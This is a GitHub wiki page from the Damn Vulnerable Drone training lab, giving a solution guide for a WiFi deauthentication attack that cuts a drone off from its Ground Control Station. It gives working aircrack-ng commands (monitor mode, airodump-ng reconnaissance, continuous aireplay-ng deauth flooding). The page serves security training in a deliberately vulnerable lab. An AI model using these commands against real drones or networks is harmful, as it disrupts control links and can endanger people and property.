Wifi Deauth Attack - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki

Disrupting the communication between the Ground Control Station (GCS) and the drone by performing a deauthentication attack on the WiFi network.

Damn Vulnerable Drone > Attack Scenarios > Denial of Service > Wifi Deauth Attack

Description

A WiFi deauthentication attack targets the communication between two devices on a WiFi network. By sending deauthentication frames to one or both devices, the attacker forces them to disconnect from the network. This can be particularly disruptive for systems that rely on continuous network connectivity, such as drones controlled by a Ground Control Station (GCS) via WiFi.

Resources


⚠️ Solution Guide

Step 1. Setup

Install the Aircrack-ng suite:

sudo apt-get update
sudo apt-get install aircrack-ng

Step 2. Enable Monitor Mode

If your wireless adapter is not already in monitor mode (e.g., wlan0mon), enable it:

sudo airmon-ng start wlan0

Step 3. Identify Target Devices

Use airodump-ng to find the MAC addresses of the access point and GCS:

sudo airodump-ng wlan0mon

Note the following:

  • AP MAC: The MAC address of the companion computer hosting the access point
  • GCS MAC: The MAC address of the Ground Control Station device
  • Ensure you are listening on the correct channel (usually 6)

Step 4. Perform Deauth Attack

Run the following command to begin deauthenticating the GCS from the drone network:

sudo aireplay-ng --deauth 0 -a <AP_MAC> -c <GCS_MAC> wlan0mon

Replace <AP_MAC> and <GCS_MAC> with the actual MAC addresses identified in Step 3. The --deauth 0 flag will send deauth frames continuously.

⚠️ **GitHub.com Fallback** ⚠️